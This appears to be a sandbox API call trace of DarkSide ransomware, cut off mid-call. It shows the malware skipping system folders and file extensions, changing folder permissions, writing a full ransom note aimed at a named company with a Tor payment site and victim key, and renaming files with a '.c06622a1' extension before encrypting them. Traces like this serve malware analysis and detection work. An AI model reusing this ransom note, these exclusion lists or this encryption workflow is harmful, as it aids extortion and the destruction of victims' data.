0x6ef663e6 [0159.647] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x596e5509 [0159.647] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5826dfe9 [0159.650] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0x6327e418 [0159.650] RtlComputeCrc32 (PartialCrc=0xe418, Buffer=0x2690094, Length=0x80) returned 0x36029f23 [0159.650] RtlComputeCrc32 (PartialCrc=0x9f23, Buffer=0x2690094, Length=0x80) returned 0x3ac4d868 [0159.650] RtlComputeCrc32 (PartialCrc=0xd868, Buffer=0x2690094, Length=0x80) returned 0x630aa3f [0159.650] RtlComputeCrc32 (PartialCrc=0xaa3f, Buffer=0x2690094, Length=0x80) returned 0x20f7e4b6 [0159.650] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0159.650] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.650] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.650] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cd25520, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8cd25520, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8cd717e0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0159.650] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0159.650] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.651] FindClose (in: hFindFile=0x154188 | out: hFindFile=0x154188) returned 1 [0159.651] _wcsicmp (_Str1="backup", _Str2="fZIk7sRS9B") returned -4 [0159.651] wcslen (_String="backup") returned 0x6 [0159.651] _wcsicmp (_Str1="bak", _Str2="fZIk7sRS9B") returned -4 [0159.651] wcslen (_String="bak") returned 0x3 [0159.651] _wcsicmp (_Str1="back", _Str2="fZIk7sRS9B") returned -4 [0159.651] wcslen (_String="back") returned 0x4 [0159.651] _wcsicmp (_Str1="archive", _Str2="fZIk7sRS9B") returned -5 [0159.651] wcslen (_String="archive") returned 0x7 [0159.651] _wcsicmp (_Str1="bckp", _Str2="fZIk7sRS9B") returned -4 [0159.651] wcslen (_String="bckp") returned 0x4 [0159.651] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0159.652] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0159.653] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5719d10, ftCreationTime.dwHighDateTime=0x1d5e19b, ftLastAccessTime.dwLowDateTime=0xe2859330, ftLastAccessTime.dwHighDateTime=0x1d5e0a8, ftLastWriteTime.dwLowDateTime=0xe2859330, ftLastWriteTime.dwHighDateTime=0x1d5e0a8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G1kIcNUvF9a1L5rTisLt", cAlternateFileName="G1KICN~1")) returned 1 [0159.653] _wcsicmp (_Str1="$recycle.bin", _Str2="G1kIcNUvF9a1L5rTisLt") returned -67 [0159.653] wcslen (_String="$recycle.bin") returned 0xc [0159.653] _wcsicmp (_Str1="config.msi", _Str2="G1kIcNUvF9a1L5rTisLt") returned -4 [0159.653] wcslen (_String="config.msi") returned 0xa [0159.653] _wcsicmp (_Str1="$windows.~bt", _Str2="G1kIcNUvF9a1L5rTisLt") returned -67 [0159.653] wcslen (_String="$windows.~bt") returned 0xc [0159.654] _wcsicmp (_Str1="$windows.~ws", _Str2="G1kIcNUvF9a1L5rTisLt") returned -67 [0159.654] wcslen (_String="$windows.~ws") returned 0xc [0159.654] _wcsicmp (_Str1="windows", _Str2="G1kIcNUvF9a1L5rTisLt") returned 16 [0159.654] wcslen (_String="windows") returned 0x7 [0159.654] _wcsicmp (_Str1="appdata", _Str2="G1kIcNUvF9a1L5rTisLt") returned -6 [0159.654] wcslen (_String="appdata") returned 0x7 [0159.654] _wcsicmp (_Str1="application data", _Str2="G1kIcNUvF9a1L5rTisLt") returned -6 [0159.654] wcslen (_String="application data") returned 0x10 [0159.654] _wcsicmp (_Str1="boot", _Str2="G1kIcNUvF9a1L5rTisLt") returned -5 [0159.654] wcslen (_String="boot") returned 0x4 [0159.654] _wcsicmp (_Str1="google", _Str2="G1kIcNUvF9a1L5rTisLt") returned 62 [0159.654] wcslen (_String="google") returned 0x6 [0159.654] _wcsicmp (_Str1="mozilla", _Str2="G1kIcNUvF9a1L5rTisLt") returned 6 [0159.654] wcslen (_String="mozilla") returned 0x7 [0159.654] _wcsicmp (_Str1="program files", _Str2="G1kIcNUvF9a1L5rTisLt") returned 9 [0159.654] wcslen (_String="program files") returned 0xd [0159.654] _wcsicmp (_Str1="program files (x86)", _Str2="G1kIcNUvF9a1L5rTisLt") returned 9 [0159.654] wcslen (_String="program files (x86)") returned 0x13 [0159.654] _wcsicmp (_Str1="programdata", _Str2="G1kIcNUvF9a1L5rTisLt") returned 9 [0159.654] wcslen (_String="programdata") returned 0xb [0159.654] _wcsicmp (_Str1="system volume information", _Str2="G1kIcNUvF9a1L5rTisLt") returned 12 [0159.654] wcslen (_String="system volume information") returned 0x19 [0159.654] _wcsicmp (_Str1="tor browser", _Str2="G1kIcNUvF9a1L5rTisLt") returned 13 [0159.654] wcslen (_String="tor browser") returned 0xb [0159.654] _wcsicmp (_Str1="windows.old", _Str2="G1kIcNUvF9a1L5rTisLt") returned 16 [0159.654] wcslen (_String="windows.old") returned 0xb [0159.654] _wcsicmp (_Str1="intel", _Str2="G1kIcNUvF9a1L5rTisLt") returned 2 [0159.654] wcslen (_String="intel") returned 0x5 [0159.654] _wcsicmp (_Str1="msocache", _Str2="G1kIcNUvF9a1L5rTisLt") returned 6 [0159.654] wcslen (_String="msocache") returned 0x8 [0159.654] _wcsicmp (_Str1="perflogs", _Str2="G1kIcNUvF9a1L5rTisLt") returned 9 [0159.654] wcslen (_String="perflogs") returned 0x8 [0159.654] _wcsicmp (_Str1="x64dbg", _Str2="G1kIcNUvF9a1L5rTisLt") returned 17 [0159.654] wcslen (_String="x64dbg") returned 0x6 [0159.654] _wcsicmp (_Str1="public", _Str2="G1kIcNUvF9a1L5rTisLt") returned 9 [0159.654] wcslen (_String="public") returned 0x6 [0159.654] _wcsicmp (_Str1="all users", _Str2="G1kIcNUvF9a1L5rTisLt") returned -6 [0159.655] wcslen (_String="all users") returned 0x9 [0159.655] _wcsicmp (_Str1="default", _Str2="G1kIcNUvF9a1L5rTisLt") returned -3 [0159.655] wcslen (_String="default") returned 0x7 [0159.655] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*" [0159.655] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned 0x29 [0159.655] wcscpy (in: _Dest=0x208e70, _Source="G1kIcNUvF9a1L5rTisLt" | out: _Dest="G1kIcNUvF9a1L5rTisLt") returned="G1kIcNUvF9a1L5rTisLt" [0159.655] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0159.655] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0159.655] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt" [0159.655] GetNamedSecurityInfoW () returned 0x0 [0159.656] SetEntriesInAclW () returned 0x0 [0159.656] SetNamedSecurityInfoW () returned 0x0 [0159.658] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22b848) returned 1 [0159.658] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e8ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0159.658] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g1kicnuvf9a1l5rtislt")) returned 1 [0159.658] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0159.658] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g1kicnuvf9a1l5rtislt\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0159.670] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e8bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e8bc*=0x7ca, lpOverlapped=0x0) returned 1 [0159.671] CloseHandle (hObject=0x1bc) returned 1 [0159.671] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0159.671] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g1kicnuvf9a1l5rtislt")) returned 0x10 [0159.671] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\") returned="" [0159.671] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\") returned 0x3d [0159.671] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\*", fInfoLevelId=0x0, lpFindFileData=0x32eb1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb1c) returned 0x154188 [0159.672] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5719d10, ftCreationTime.dwHighDateTime=0x1d5e19b, ftLastAccessTime.dwLowDateTime=0x8cde3c00, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8cde3c00, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.672] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cdbdaa0, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8cdbdaa0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8cde3c00, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0159.672] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0159.672] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99225ea0, ftCreationTime.dwHighDateTime=0x1d5da6b, ftLastAccessTime.dwLowDateTime=0x1d6fa370, ftLastAccessTime.dwHighDateTime=0x1d5e0ac, ftLastWriteTime.dwLowDateTime=0x1d6fa370, ftLastWriteTime.dwHighDateTime=0x1d5e0ac, nFileSizeHigh=0x0, nFileSizeLow=0x14918, dwReserved0=0x0, dwReserved1=0x0, cFileName="UFLQyipcXOQgG4p.wav", cAlternateFileName="UFLQYI~1.WAV")) returned 1 [0159.672] _wcsicmp (_Str1="UFLQyipcXOQgG4p.wav", _Str2="README.c06622a1.TXT") returned 3 [0159.672] wcsstr (_Str="UFLQyipcXOQgG4p.wav", _SubStr="README") returned 0x0 [0159.672] _wcsicmp (_Str1="autorun.inf", _Str2="UFLQyipcXOQgG4p.wav") returned -20 [0159.672] wcslen (_String="autorun.inf") returned 0xb [0159.672] _wcsicmp (_Str1="boot.ini", _Str2="UFLQyipcXOQgG4p.wav") returned -19 [0159.672] wcslen (_String="boot.ini") returned 0x8 [0159.672] _wcsicmp (_Str1="bootfont.bin", _Str2="UFLQyipcXOQgG4p.wav") returned -19 [0159.672] wcslen (_String="bootfont.bin") returned 0xc [0159.672] _wcsicmp (_Str1="bootsect.bak", _Str2="UFLQyipcXOQgG4p.wav") returned -19 [0159.672] wcslen (_String="bootsect.bak") returned 0xc [0159.672] _wcsicmp (_Str1="desktop.ini", _Str2="UFLQyipcXOQgG4p.wav") returned -17 [0159.672] wcslen (_String="desktop.ini") returned 0xb [0159.672] _wcsicmp (_Str1="iconcache.db", _Str2="UFLQyipcXOQgG4p.wav") returned -12 [0159.672] wcslen (_String="iconcache.db") returned 0xc [0159.672] _wcsicmp (_Str1="ntldr", _Str2="UFLQyipcXOQgG4p.wav") returned -7 [0159.673] wcslen (_String="ntldr") returned 0x5 [0159.673] _wcsicmp (_Str1="ntuser.dat", _Str2="UFLQyipcXOQgG4p.wav") returned -7 [0159.673] wcslen (_String="ntuser.dat") returned 0xa [0159.673] _wcsicmp (_Str1="ntuser.dat.log", _Str2="UFLQyipcXOQgG4p.wav") returned -7 [0159.673] wcslen (_String="ntuser.dat.log") returned 0xe [0159.673] _wcsicmp (_Str1="ntuser.ini", _Str2="UFLQyipcXOQgG4p.wav") returned -7 [0159.673] wcslen (_String="ntuser.ini") returned 0xa [0159.673] _wcsicmp (_Str1="thumbs.db", _Str2="UFLQyipcXOQgG4p.wav") returned -1 [0159.673] wcslen (_String="thumbs.db") returned 0x9 [0159.673] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0159.673] wcslen (_String="386") returned 0x3 [0159.673] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0159.673] wcslen (_String="adv") returned 0x3 [0159.673] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0159.673] wcslen (_String="ani") returned 0x3 [0159.673] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0159.673] wcslen (_String="bat") returned 0x3 [0159.673] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0159.673] wcslen (_String="bin") returned 0x3 [0159.673] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0159.673] wcslen (_String="cab") returned 0x3 [0159.673] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0159.673] wcslen (_String="cmd") returned 0x3 [0159.673] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0159.673] wcslen (_String="com") returned 0x3 [0159.673] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0159.673] wcslen (_String="cpl") returned 0x3 [0159.673] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0159.673] wcslen (_String="cur") returned 0x3 [0159.673] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0159.673] wcslen (_String="deskthemepack") returned 0xd [0159.673] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0159.673] wcslen (_String="diagcab") returned 0x7 [0159.674] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0159.674] wcslen (_String="diagcfg") returned 0x7 [0159.674] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0159.674] wcslen (_String="diagpkg") returned 0x7 [0159.674] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0159.674] wcslen (_String="dll") returned 0x3 [0159.674] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0159.674] wcslen (_String="drv") returned 0x3 [0159.674] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0159.674] wcslen (_String="exe") returned 0x3 [0159.674] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0159.674] wcslen (_String="hlp") returned 0x3 [0159.674] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0159.674] wcslen (_String="icl") returned 0x3 [0159.674] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0159.674] wcslen (_String="icns") returned 0x4 [0159.674] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0159.674] wcslen (_String="ico") returned 0x3 [0159.674] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0159.674] wcslen (_String="ics") returned 0x3 [0159.674] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0159.674] wcslen (_String="idx") returned 0x3 [0159.674] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0159.674] wcslen (_String="ldf") returned 0x3 [0159.674] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0159.674] wcslen (_String="lnk") returned 0x3 [0159.674] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0159.674] wcslen (_String="mod") returned 0x3 [0159.674] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0159.674] wcslen (_String="mpa") returned 0x3 [0159.674] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0159.674] wcslen (_String="msc") returned 0x3 [0159.674] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0159.674] wcslen (_String="msp") returned 0x3 [0159.675] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0159.675] wcslen (_String="msstyles") returned 0x8 [0159.675] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0159.675] wcslen (_String="msu") returned 0x3 [0159.675] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0159.675] wcslen (_String="nls") returned 0x3 [0159.675] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0159.675] wcslen (_String="nomedia") returned 0x7 [0159.675] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0159.675] wcslen (_String="ocx") returned 0x3 [0159.675] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0159.675] wcslen (_String="prf") returned 0x3 [0159.675] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0159.675] wcslen (_String="ps1") returned 0x3 [0159.675] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0159.675] wcslen (_String="rom") returned 0x3 [0159.675] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0159.675] wcslen (_String="rtp") returned 0x3 [0159.675] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0159.675] wcslen (_String="scr") returned 0x3 [0159.675] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0159.675] wcslen (_String="shs") returned 0x3 [0159.675] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0159.675] wcslen (_String="spl") returned 0x3 [0159.675] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0159.675] wcslen (_String="sys") returned 0x3 [0159.675] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0159.675] wcslen (_String="theme") returned 0x5 [0159.675] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0159.675] wcslen (_String="themepack") returned 0x9 [0159.675] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0159.675] wcslen (_String="wpx") returned 0x3 [0159.675] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0159.675] wcslen (_String="lock") returned 0x4 [0159.675] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0159.675] wcslen (_String="key") returned 0x3 [0159.676] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0159.676] wcslen (_String="hta") returned 0x3 [0159.676] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0159.676] wcslen (_String="msi") returned 0x3 [0159.676] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0159.676] wcslen (_String="pdb") returned 0x3 [0159.676] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0159.676] wcslen (_String="sqlite") returned 0x6 [0159.676] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g1kicnuvf9a1l5rtislt")) returned 0x10 [0159.676] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.676] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt" [0159.676] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt") returned 0x3c [0159.676] wcscpy (in: _Dest=0x32400da, _Source="UFLQyipcXOQgG4p.wav" | out: _Dest="UFLQyipcXOQgG4p.wav") returned="UFLQyipcXOQgG4p.wav" [0159.676] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\UFLQyipcXOQgG4p.wav", dwFileAttributes=0x80) returned 1 [0159.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\UFLQyipcXOQgG4p.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g1kicnuvf9a1l5rtislt\\uflqyipcxoqgg4p.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d0 [0159.676] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.676] ReadFile (in: hFile=0x1d0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0159.677] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x814f1306 [0159.677] RtlComputeCrc32 (PartialCrc=0x1306, Buffer=0x32e9a4, Length=0x80) returned 0xcc8d9f52 [0159.677] RtlComputeCrc32 (PartialCrc=0x9f52, Buffer=0x32e9a4, Length=0x80) returned 0xcd3e102f [0159.677] RtlComputeCrc32 (PartialCrc=0x102f, Buffer=0x32e9a4, Length=0x80) returned 0x48056f49 [0159.677] RtlComputeCrc32 (PartialCrc=0x6f49, Buffer=0x32e9a4, Length=0x80) returned 0x67da005e [0159.677] CloseHandle (hObject=0x1d0) returned 1 [0159.677] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.677] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\UFLQyipcXOQgG4p.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\UFLQyipcXOQgG4p.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\UFLQyipcXOQgG4p.wav" [0159.677] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\UFLQyipcXOQgG4p.wav") returned 0x50 [0159.677] wcscpy (in: _Dest=0x3250108, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.677] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\UFLQyipcXOQgG4p.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g1kicnuvf9a1l5rtislt\\uflqyipcxoqgg4p.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\UFLQyipcXOQgG4p.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g1kicnuvf9a1l5rtislt\\uflqyipcxoqgg4p.wav.c06622a1"), dwFlags=0x8) returned 1 [0159.680] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\G1kIcNUvF9a1L5rTisLt\\UFLQyipcXOQgG4p.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g1kicnuvf9a1l5rtislt\\uflqyipcxoqgg4p.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d0 [0159.680] CreateIoCompletionPort (FileHandle=0x1d0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0159.680] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, 